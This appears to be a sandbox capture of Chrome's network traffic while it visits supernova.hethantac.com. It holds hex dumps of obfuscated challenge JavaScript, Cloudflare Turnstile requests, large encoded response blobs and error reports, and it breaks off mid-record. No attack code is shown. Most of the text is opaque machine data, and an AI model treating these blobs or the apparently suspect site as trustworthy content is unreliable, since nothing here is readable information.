                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 69 7d 2c 65 5b 6a 63 28 31 30 34 31 29 5d 3d 6a 63 28 39 38 30 29 2c 66 3d 65 2c 67 3d 64 5b 6a 63 28 31 30 39 30 29 5d 2c 67 26 26 67 5b 6a 63 28 37 36 37 29 5d 3d 3d 3d 6a 63 28 31 34 38 37 29 26 26 66 5b 6a 63 28 31 34 35 37 29 5d 28 67 5b 6a 63 28 31 33 31 36 29 5d 2c 6a 63 28 35 38 35 29 29 3f 67 65 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 48 28 29 7d 2c 31 65 33 29 3a 67 26 26 67 5b 6a 63 28 37 36 37 29 5d 3d 3d 3d 6a 63 28 31 34 38 37 29 26 26 67 5b 6a 63 28 31 33 31 36 29 5d 3d 3d 3d 66 5b 6a 63 28 31 30 34 31 29 5d 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 67 65 29 7d 29 2c 67 67 3d 21 5b 5d 2c 21 66 48 28 67 4c 28 31 37 31 35 29 29 26 26 28 67 48 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74
                                                                                                                                          Data Ascii: i},e[jc(1041)]=jc(980),f=e,g=d[jc(1090)],g&&g[jc(767)]===jc(1487)&&f[jc(1457)](g[jc(1316)],jc(585))?ge=setInterval(function(){gH()},1e3):g&&g[jc(767)]===jc(1487)&&g[jc(1316)]===f[jc(1041)]&&clearInterval(ge)}),gg=![],!fH(gL(1715))&&(gH(),setInterval(funct
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 29 2c 27 58 62 58 55 63 27 3a 6a 51 28 37 34 30 29 2c 27 4b 71 45 62 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 61 54 44 6a 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 49 4c 78 50 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 47 50 56 46 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 79 43 67 77 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 74 42 7a 72 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 73 48 4f 71 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68
                                                                                                                                          Data Ascii: ),'XbXUc':jQ(740),'KqEbV':function(h,i){return h|i},'aTDjY':function(h,i){return h==i},'ILxPn':function(h,i){return i&h},'GPVFX':function(h,i){return h(i)},'yCgwZ':function(h,i){return i==h},'tBzrG':function(h,i){return h<i},'sHOqd':function(h,i){return h
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 35 39 29 5d 28 42 2c 4d 29 29 44 3d 4d 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 54 28 37 39 30 29 5d 5b 6a 54 28 36 34 38 29 5d 5b 6a 54 28 37 35 39 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 6a 54 28 31 32 36 36 29 5d 28 32 35 36 2c 44 5b 6a 54 28 31 38 36 37 29 5d 28 30 29 29 29 7b 66 6f 72 28 78 3d 30 3b 78 3c 47 3b 49 3c 3c 3d 31 2c 4a 3d 3d 64 5b 6a 54 28 31 35 33 37 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 6a 54 28 31 33 33 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 6a 54 28 31 38 36 37 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 49 3c 3c 31 2e 35 32 7c 4e 26 31 2c 64 5b 6a 54 28 31 34 31 30 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 6a 54 28 31 33 33 34 29 5d 28 6f 28 49
                                                                                                                                          Data Ascii: 59)](B,M))D=M;else{if(Object[jT(790)][jT(648)][jT(759)](C,D)){if(d[jT(1266)](256,D[jT(1867)](0))){for(x=0;x<G;I<<=1,J==d[jT(1537)](j,1)?(J=0,H[jT(1334)](o(I)),I=0):J++,x++);for(N=D[jT(1867)](0),x=0;8>x;I=I<<1.52|N&1,d[jT(1410)](J,j-1)?(J=0,H[jT(1334)](o(I


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.1655134104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:28 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 3106
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          CF-Challenge: UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:28 UTC3106OUTData Raw: 76 5f 38 65 34 35 61 61 37 32 36 61 63 66 34 38 35 37 3d 31 4e 77 33 7a 33 48 33 4f 33 4b 33 4d 33 73 59 24 56 59 24 7a 66 57 7a 57 46 62 4c 57 62 24 57 66 42 46 65 4e 52 24 51 42 24 68 66 68 65 70 77 57 58 68 42 41 35 48 24 65 71 38 33 24 7a 37 47 6a 24 70 30 52 57 54 24 4b 66 62 46 79 35 34 24 62 6a 24 6b 52 57 51 48 68 24 66 57 46 24 4a 33 52 57 4a 55 39 64 75 24 6e 57 33 24 45 6a 4b 24 6a 7a 57 41 24 4a 4e 42 24 64 4f 33 75 41 54 6d 34 71 4e 39 74 44 36 33 42 43 46 56 24 4f 5a 24 24 68 35 63 30 57 30 32 4f 24 33 24 25 32 62 2b 55 53 67 6b 66 52 58 56 6e 4e 74 77 75 70 6a 42 4f 46 24 5a 75 71 24 31 35 38 78 37 68 37 39 4b 66 57 63 77 6d 70 4b 62 42 4f 51 24 42 65 24 6a 63 43 77 33 57 4b 24 41 66 46 70 68 32 57 31 31 58 68 53 6a 33 66 32 2b 66 77 24 62
                                                                                                                                          Data Ascii: v_8e45aa726acf4857=1Nw3z3H3O3K3M3sY$VY$zfWzWFbLWb$WfBFeNR$QB$hfhepwWXhBA5H$eq83$z7Gj$p0RWT$KfbFy54$bj$kRWQHh$fWF$J3RWJU9du$nW3$EjK$jzWA$JNB$dO3uATm4qN9tD63BCFV$OZ$$h5c0W02O$3$%2b+USgkfRXVnNtwupjBOF$Zuq$158x7h79KfWcwmpKbBOQ$Be$jcCw3WK$AfFph2W11XhSj3f2+fw$b
                                                                                                                                          2024-11-18 05:47:28 UTC747INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:28 GMT
                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                          Content-Length: 149992
                                                                                                                                          Connection: close
                                                                                                                                          cf-chl-gen: U+y0gkiik7W4UtePVomvazjEU2wAYOY7ks0dfKxO03VjgCGerKgVXGi2vjWGUITuoPTdUmQm2NQOwgkzxji22dyMm1RKrG+gVjUpSrQxqMOU0QApsBBqggHyWB6AHMXrfuKspLgu2b4h8lbmSd7EK4C2kqx8HgwkYl/t2VJG/1NgMgb0m0TtGCmlJuA5nmj5OTfsuvtBIjHotPuz6l5RDnCUTr+xH7VeZLnIkjpmPuQHv24Kd5FlDM4FA2pCgDaJevN+3rq57f+sFUzNZ0inZx4ZK20e+N8R7Gxf96nsUapFbiPiR6lwSEo6rESGyDYbGAdnVpcvV2MESuHmLpZR4FZt/YctKNZtXU7S97I3PQC3+H5ANOAAnrGg0aZGeUwTXccNp3mPNjjAo8a/O65vbTfUgKtmB+MM6AOHiOnkhUpFHS4k3wP52yeWSs1YHiTjhHs32dRAAJaGDg/bby0ZcnmwZx6aLtWFKkhJu9wx2GeN35s=$9cUhdTYWkbOClwci
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa7f4fd9ddb2-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:28 UTC622INData Raw: 65 37 36 2f 77 70 69 68 6d 61 47 59 70 63 53 66 69 71 76 4c 6f 4b 4b 63 6b 4c 4f 68 31 37 48 45 76 4c 48 51 70 71 79 35 6d 4e 79 76 35 4b 54 41 6f 62 58 55 74 36 58 59 32 74 61 6c 78 76 4c 75 79 65 37 48 30 39 2f 72 37 63 58 59 73 2f 54 71 7a 4e 6a 4e 34 64 62 64 2b 2f 7a 63 42 37 2f 49 2b 65 45 41 7a 64 73 41 41 50 44 66 46 42 54 78 35 75 4c 6c 2b 75 62 36 38 51 72 52 44 50 44 55 4a 42 38 54 32 43 67 6b 43 51 54 68 4a 2b 73 61 36 42 4c 76 43 41 55 6b 4e 4f 77 48 4f 76 45 45 4f 2f 51 4c 50 7a 4c 2b 39 77 74 42 47 50 35 46 52 52 78 48 46 55 42 43 50 30 55 4e 4d 43 41 4f 50 53 6f 32 51 7a 45 68 51 30 77 55 50 6a 35 49 55 55 45 76 4d 7a 39 58 57 54 56 45 49 55 4d 38 57 6b 6b 6d 51 31 42 67 55 6b 74 30 53 33 4e 6c 4e 6d 5a 32 4c 54 78 7a 4f 56 5a 4b 59 6b 4a
                                                                                                                                          Data Ascii: e76/wpihmaGYpcSfiqvLoKKckLOh17HEvLHQpqy5mNyv5KTAobXUt6XY2talxvLuye7H09/r7cXYs/TqzNjN4dbd+/zcB7/I+eEAzdsAAPDfFBTx5uLl+ub68QrRDPDUJB8T2CgkCQThJ+sa6BLvCAUkNOwHOvEEO/QLPzL+9wtBGP5FRRxHFUBCP0UNMCAOPSo2QzEhQ0wUPj5IUUEvMz9XWTVEIUM8WkkmQ1BgUkt0S3NlNmZ2LTxzOVZKYkJ
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 31 74 56 56 57 61 6b 4a 71 57 66 6c 5a 54 6f 58 39 6a 66 4a 65 61 63 48 79 70 5a 6d 6d 47 69 6f 65 65 68 70 43 72 71 71 53 4e 6c 4c 6c 79 64 49 79 39 66 5a 2b 65 76 37 71 64 6f 71 4c 46 76 38 47 43 68 4d 4f 56 68 61 53 4c 6f 38 6a 52 77 37 75 7a 77 4d 43 50 75 4c 57 6e 71 70 57 62 72 4c 2f 4f 6d 4e 6d 32 73 39 4c 68 7a 38 44 6d 34 73 75 30 33 71 43 71 79 72 2f 46 37 39 48 45 79 4f 7a 32 77 64 44 6e 37 76 4b 39 76 63 72 4d 37 2b 37 61 30 65 37 59 2f 64 59 43 41 51 49 4c 43 4d 2f 69 45 51 2f 7a 35 73 73 53 39 76 54 54 46 52 48 33 36 68 6e 39 45 76 48 38 33 66 45 44 39 2f 37 36 32 79 51 65 39 65 54 38 37 69 66 2b 4b 52 44 79 41 51 41 7a 4a 79 51 78 43 51 55 49 44 69 72 37 44 54 6e 39 47 41 38 5a 48 7a 55 48 4f 54 38 69 50 42 34 51 48 52 74 4f 4d 69 77 57 4c
                                                                                                                                          Data Ascii: 1tVVWakJqWflZToX9jfJeacHypZmmGioeehpCrqqSNlLlydIy9fZ+ev7qdoqLFv8GChMOVhaSLo8jRw7uzwMCPuLWnqpWbrL/OmNm2s9Lhz8Dm4su03qCqyr/F79HEyOz2wdDn7vK9vcrM7+7a0e7Y/dYCAQILCM/iEQ/z5ssS9vTTFRH36hn9EvH83fED9/762yQe9eT87if+KRDyAQAzJyQxCQUIDir7DTn9GA8ZHzUHOT8iPB4QHRtOMiwWL
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 31 62 6c 68 65 59 5a 42 36 63 34 42 30 6d 6f 71 57 71 4a 6d 45 66 4a 65 45 6e 49 6d 4a 61 36 6d 74 72 4a 64 34 68 6e 71 57 6b 72 4b 62 72 35 53 52 76 58 2b 52 75 70 4f 35 74 35 36 6f 77 4c 7a 42 71 37 71 4f 79 4d 61 67 74 5a 4b 6a 75 59 2b 57 75 4e 4f 62 6d 63 43 63 77 4f 50 51 74 63 44 6d 32 4d 6e 6d 71 74 33 6a 35 71 33 6c 72 4d 43 73 37 38 58 41 72 37 44 5a 35 76 6d 78 38 2b 62 39 30 76 33 55 37 67 4c 33 32 4c 33 78 38 66 4c 61 2f 76 76 70 35 2b 6a 4b 7a 41 76 63 37 41 59 47 7a 67 6a 70 35 76 67 59 47 67 77 4e 48 39 7a 38 49 67 62 30 41 50 50 33 41 51 58 32 41 76 30 49 2f 65 33 6a 36 54 50 78 4b 68 4d 4d 4e 41 73 72 4e 6a 76 36 2b 50 30 4d 47 7a 67 6c 46 43 45 55 42 52 51 68 43 68 73 69 43 55 41 35 49 77 68 50 52 52 4d 55 48 7a 51 69 44 41 30 37 47 43
                                                                                                                                          Data Ascii: 1blheYZB6c4B0moqWqJmEfJeEnImJa6mtrJd4hnqWkrKbr5SRvX+RupO5t56owLzBq7qOyMagtZKjuY+WuNObmcCcwOPQtcDm2Mnmqt3j5q3lrMCs78XAr7DZ5vmx8+b90v3U7gL32L3x8fLa/vvp5+jKzAvc7AYGzgjp5vgYGgwNH9z8Igb0APP3AQX2Av0I/e3j6TPxKhMMNAsrNjv6+P0MGzglFCEUBRQhChsiCUA5IwhPRRMUHzQiDA07GC
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 66 70 32 47 67 46 39 30 70 71 47 4e 70 58 36 4b 59 33 71 65 69 59 61 6e 62 62 4b 45 67 37 61 57 76 49 64 78 75 4a 75 6a 76 62 4a 37 76 61 43 2b 6e 72 31 39 79 71 44 41 74 34 75 4e 79 61 47 63 74 4d 66 49 71 4d 7a 49 72 37 54 4f 32 74 66 5a 32 70 32 30 73 62 66 61 7a 36 66 63 70 39 58 59 35 63 54 66 70 36 37 41 76 2b 43 2b 73 4c 54 4e 39 63 72 76 37 50 61 39 79 63 44 70 2f 67 44 52 30 39 2f 79 39 50 62 62 43 39 6b 4b 7a 41 44 4f 33 75 72 4b 30 75 38 44 36 4f 77 52 31 78 72 70 31 77 7a 56 32 66 4d 68 45 74 38 52 45 75 41 52 35 42 59 46 36 51 51 77 43 4f 33 6f 2b 67 38 31 38 41 34 4d 42 50 67 32 45 50 51 33 4e 54 46 43 41 51 41 2b 49 41 55 42 4a 7a 6f 6b 48 44 76 2b 51 31 41 38 4b 6b 52 4a 54 43 34 72 46 31 45 54 4a 56 63 39 46 54 4a 4f 59 44 52 6a 4f 7a 56
                                                                                                                                          Data Ascii: fp2GgF90pqGNpX6KY3qeiYanbbKEg7aWvIdxuJujvbJ7vaC+nr19yqDAt4uNyaGctMfIqMzIr7TO2tfZ2p20sbfaz6fcp9XY5cTfp67Av+C+sLTN9crv7Pa9ycDp/gDR09/y9PbbC9kKzADO3urK0u8D6OwR1xrp1wzV2fMhEt8REuAR5BYF6QQwCO3o+g818A4MBPg2EPQ3NTFCAQA+IAUBJzokHDv+Q1A8KkRJTC4rF1ETJVc9FTJOYDRjOzV
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 35 36 73 61 4b 53 42 67 49 2b 74 6f 49 39 2b 6a 62 64 35 65 6f 52 33 6b 37 4b 49 72 72 75 2f 67 70 6d 68 6e 6f 2b 54 6b 36 68 39 6c 36 57 4e 6e 73 43 6b 70 73 79 4f 6b 34 7a 59 78 71 4b 78 6b 74 4b 54 74 4e 53 61 33 36 32 79 77 62 66 6d 76 38 6d 62 34 36 53 39 32 61 6e 4d 32 75 44 6d 34 74 2f 56 77 2b 72 6b 31 72 48 71 37 74 37 64 75 66 48 30 7a 39 2f 78 30 2b 4c 52 38 4f 6b 42 31 4e 37 65 45 4d 38 46 7a 78 50 6e 34 52 59 53 39 75 6f 62 46 2f 62 77 31 66 49 64 46 43 4c 77 41 78 4d 6a 35 66 77 6d 48 68 51 43 4a 53 72 72 49 43 73 75 47 79 51 46 4d 42 38 6f 4e 7a 49 4e 37 66 6a 7a 4c 7a 45 50 38 30 45 62 41 41 51 65 52 66 34 4b 53 77 6f 6e 43 43 35 4c 4c 6c 4e 4c 51 43 67 2f 4e 45 4d 6e 4e 54 67 6c 55 44 30 6f 4d 6a 68 4f 56 69 30 33 51 52 39 62 52 30 5a 64
                                                                                                                                          Data Ascii: 56saKSBgI+toI9+jbd5eoR3k7KIrru/gpmhno+Tk6h9l6WNnsCkpsyOk4zYxqKxktKTtNSa362ywbfmv8mb46S92anM2uDm4t/Vw+rk1rHq7t7dufH0z9/x0+LR8OkB1N7eEM8FzxPn4RYS9uobF/bw1fIdFCLwAxMj5fwmHhQCJSrrICsuGyQFMB8oNzIN7fjzLzEP80EbAAQeRf4KSwonCC5LLlNLQCg/NEMnNTglUD0oMjhOVi03QR9bR0Zd
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 61 4a 62 59 47 7a 74 6f 43 77 63 6f 4f 62 6b 61 65 65 6a 73 4b 37 6f 4b 4b 75 6c 4b 69 7a 71 59 4b 2f 68 63 72 49 69 61 53 79 78 72 4b 70 6b 37 66 46 77 63 65 70 79 36 72 4d 71 36 7a 57 76 64 54 69 75 4d 43 33 70 2b 50 59 30 75 43 72 6e 37 62 64 76 4b 6a 47 71 63 54 32 76 72 48 56 73 73 36 36 35 73 7a 48 33 51 44 32 32 2f 48 66 30 66 54 48 41 67 66 41 33 67 6e 72 34 4e 72 62 41 75 66 79 41 41 6e 6c 45 67 62 51 45 76 6b 46 47 64 63 66 37 77 33 61 38 74 38 69 2f 67 49 4b 2f 51 72 34 35 69 38 67 35 67 4c 2b 4d 2b 6f 54 2f 69 59 69 38 66 49 49 4f 50 4d 2b 45 79 77 58 44 52 6e 37 49 6a 59 43 4f 43 59 4a 42 6b 45 37 53 42 38 68 51 44 77 76 4a 69 64 57 55 7a 45 74 57 43 77 37 4b 56 55 62 57 44 5a 55 4d 42 59 37 58 44 63 6d 56 30 59 6d 56 32 68 68 52 32 64 4f 59
                                                                                                                                          Data Ascii: aJbYGztoCwcoObkaeejsK7oKKulKizqYK/hcrIiaSyxrKpk7fFwcepy6rMq6zWvdTiuMC3p+PY0uCrn7bdvKjGqcT2vrHVss665szH3QD22/Hf0fTHAgfA3gnr4NrbAufyAAnlEgbQEvkFGdcf7w3a8t8i/gIK/Qr45i8g5gL+M+oT/iYi8fIIOPM+EywXDRn7IjYCOCYJBkE7SB8hQDwvJidWUzEtWCw7KVUbWDZUMBY7XDcmV0YmV2hhR2dOY
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 31 73 49 71 46 73 33 61 73 69 62 43 35 72 62 65 6d 6b 4a 32 52 74 49 4b 49 6e 4b 37 42 79 72 79 75 69 35 79 31 72 73 71 6f 79 64 69 55 70 34 36 54 6d 62 79 65 77 64 79 77 74 74 43 66 78 4b 50 58 75 65 61 6f 31 65 4f 75 79 2b 62 65 71 61 32 72 7a 72 4b 32 30 64 57 36 2b 4d 6e 76 31 37 7a 55 38 2f 55 42 31 77 6a 58 76 74 66 6d 31 67 45 4a 7a 4f 2f 6d 36 50 76 79 41 73 77 58 7a 67 6e 6c 47 68 77 59 44 52 33 57 2b 2f 4d 5a 2f 52 55 66 34 79 41 71 49 2f 30 4c 39 69 55 6e 47 67 51 74 43 77 55 41 46 68 51 6a 36 6a 49 48 48 66 6f 65 48 6b 41 4e 4c 66 7a 37 4f 54 54 39 47 78 49 45 52 78 30 56 54 6b 77 47 53 41 51 46 54 53 4d 54 48 7a 64 52 49 30 64 56 57 68 70 63 58 56 51 59 4c 6a 51 68 4f 79 4e 6b 5a 55 42 47 58 30 42 4d 61 44 35 50 5a 46 52 63 64 57 68 59 54 6d
                                                                                                                                          Data Ascii: 1sIqFs3asibC5rbemkJ2RtIKInK7Byryui5y1rsqoydiUp46TmbyewdywttCfxKPXueao1eOuy+beqa2rzrK20dW6+Mnv17zU8/UB1wjXvtfm1gEJzO/m6PvyAswXzgnlGhwYDR3W+/MZ/RUf4yAqI/0L9iUnGgQtCwUAFhQj6jIHHfoeHkANLfz7OTT9GxIERx0VTkwGSAQFTSMTHzdRI0dVWhpcXVQYLjQhOyNkZUBGX0BMaD5PZFRcdWhYTm
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 6a 38 4b 52 67 70 43 37 68 71 54 44 68 49 5a 39 75 72 57 66 7a 39 48 4f 70 61 6d 7a 30 71 6d 2f 31 39 50 53 31 39 76 4d 73 74 65 36 32 4b 75 37 72 4a 79 6d 76 73 58 70 76 74 6e 4d 70 61 37 6a 75 38 79 79 30 2b 7a 55 77 39 4c 31 73 74 66 30 79 4e 75 32 41 62 32 34 75 72 7a 34 74 39 33 6b 39 76 62 33 36 2f 37 57 44 77 62 69 43 66 7a 62 34 51 4c 6b 41 74 4c 70 47 42 59 4f 32 39 6f 67 38 67 49 69 39 2f 73 6b 33 77 55 6c 42 4f 4d 4a 42 52 77 6f 35 77 67 51 4c 79 45 50 45 68 51 67 4e 78 67 48 44 44 67 59 4f 52 55 67 47 67 31 45 4e 55 55 52 41 52 63 70 50 52 6c 4d 51 6b 73 73 50 7a 77 78 42 69 46 52 46 41 34 6b 57 55 64 51 4c 6a 52 4d 4b 79 6c 68 4c 57 56 54 4a 52 6c 52 49 53 64 59 4f 32 68 68 53 6d 64 74 58 6b 4e 67 51 56 4a 75 51 6d 68 47 4e 47 70 49 61 55 30
                                                                                                                                          Data Ascii: j8KRgpC7hqTDhIZ9urWfz9HOpamz0qm/19PS19vMste62Ku7rJymvsXpvtnMpa7ju8yy0+zUw9L1stf0yNu2Ab24urz4t93k9vb36/7WDwbiCfzb4QLkAtLpGBYO29og8gIi9/sk3wUlBOMJBRwo5wgQLyEPEhQgNxgHDDgYORUgGg1ENUURARcpPRlMQkssPzwxBiFRFA4kWUdQLjRMKylhLWVTJRlRISdYO2hhSmdtXkNgQVJuQmhGNGpIaU0
                                                                                                                                          2024-11-18 05:47:28 UTC1369INData Raw: 71 4b 35 76 36 4b 64 7a 62 6d 66 76 73 57 6f 7a 5a 79 76 6c 63 36 30 72 39 58 4c 32 71 72 58 31 4c 66 4c 6e 74 44 69 33 72 6e 42 74 71 48 6a 30 75 6e 4b 6e 38 4c 73 7a 4b 76 64 78 75 6e 46 78 76 66 57 7a 65 6a 6e 30 50 4d 41 37 50 37 38 77 74 77 46 2b 63 37 51 2f 75 72 57 79 63 6e 48 78 2b 66 51 35 66 7a 53 34 4d 66 4d 36 74 6a 55 35 42 6e 6b 7a 39 30 54 48 66 62 75 34 68 45 6e 41 64 34 70 46 75 58 6b 4b 66 76 75 39 79 45 68 49 44 41 47 49 52 63 31 4f 51 73 63 4f 66 6f 37 4e 53 38 75 44 41 77 6a 41 52 4e 48 52 67 6b 66 4a 6a 6f 32 42 41 63 37 4a 68 6f 2b 55 7a 51 79 4b 7a 68 49 4d 30 30 35 57 46 4d 56 53 31 34 37 47 78 35 6b 5a 7a 4e 53 5a 56 34 36 54 55 4a 4e 50 45 6c 53 58 6d 74 46 54 6b 42 6f 61 55 68 72 5a 31 30 7a 64 30 75 42 61 6e 52 35 58 58 4a 44
                                                                                                                                          Data Ascii: qK5v6KdzbmfvsWozZyvlc60r9XL2qrX1LfLntDi3rnBtqHj0unKn8LszKvdxunFxvfWzejn0PMA7P78wtwF+c7Q/urWycnHx+fQ5fzS4MfM6tjU5Bnkz90THfbu4hEnAd4pFuXkKfvu9yEhIDAGIRc1OQscOfo7NS8uDAwjARNHRgkfJjo2BAc7Jho+UzQyKzhIM005WFMVS147Gx5kZzNSZV46TUJNPElSXmtFTkBoaUhrZ10zd0uBanR5XXJD


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.165513535.190.80.14436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:28 UTC540OUTOPTIONS /report/v4?s=vNF3VZu5q7fgnedemQfg16x%2Fy1s3RtlC8xfOQLUEEY6393on1iQYnZSF924SxtfPPQkJr8OxQQM32MUU3UP8kF9XSf6skODokXPrk9ROO3OhGaNLAK4l9R%2FeMqEMXA%3D%3D HTTP/1.1
                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Origin: https://supernova.hethantac.com
                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:28 UTC336INHTTP/1.1 200 OK
                                                                                                                                          Content-Length: 0
                                                                                                                                          access-control-max-age: 86400
                                                                                                                                          access-control-allow-methods: OPTIONS, POST
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          access-control-allow-headers: content-type, content-length
                                                                                                                                          date: Mon, 18 Nov 2024 05:47:28 GMT
                                                                                                                                          Via: 1.1 google
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.165513635.190.80.14436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:29 UTC474OUTPOST /report/v4?s=vNF3VZu5q7fgnedemQfg16x%2Fy1s3RtlC8xfOQLUEEY6393on1iQYnZSF924SxtfPPQkJr8OxQQM32MUU3UP8kF9XSf6skODokXPrk9ROO3OhGaNLAK4l9R%2FeMqEMXA%3D%3D HTTP/1.1
                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 443
                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:29 UTC443OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 73 75 70 65 72 6e 6f 76 61 2e 68 65 74 68 61 6e 74 61 63 2e 63 6f 6d 2f 33 58 64 5a 51 78 54 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b
                                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":138,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://supernova.hethantac.com/3XdZQxT/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network
